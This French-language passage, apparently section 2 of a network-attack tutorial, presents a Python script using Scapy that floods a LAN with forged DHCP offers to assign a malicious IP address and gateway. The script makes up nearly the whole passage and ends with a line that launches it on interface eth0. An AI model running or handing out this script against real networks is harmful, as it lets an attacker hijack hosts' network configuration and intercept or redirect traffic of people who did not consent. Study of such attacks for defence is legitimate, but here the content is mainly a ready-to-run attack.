2. Usurpation de service DHCP
Cette attaque consiste à usurper les réponses DHCP sur le réseau pour attribuer des IP malveillantes. Scapy est utilisé ici.
Script Python : DHCP Spoofing


from scapy.all import *

def dhcp_spoof(interface):
    print("Lancement de l'usurpation DHCP")
    try:
        while True:
            # Créez un paquet DHCP offrant une adresse IP malveillante
            dhcp_offer = Ether(dst="ff:ff:ff:ff:ff:ff") / \
                         IP(src="192.168.1.1", dst="255.255.255.255") / \
                         UDP(sport=67, dport=68) / \
                         BOOTP(op=2, yiaddr="192.168.1.100", siaddr="192.168.1.1") / \
                         DHCP(options=[("message-type", "offer"), ("server_id", "192.168.1.1"), "end"])
            sendp(dhcp_offer, iface=interface, verbose=False)
    except KeyboardInterrupt:
        print("Arrêt de l'attaque.")

# Interface réseau sur laquelle lancer l'attaque (exemple : eth0)
dhcp_spoof("eth0")

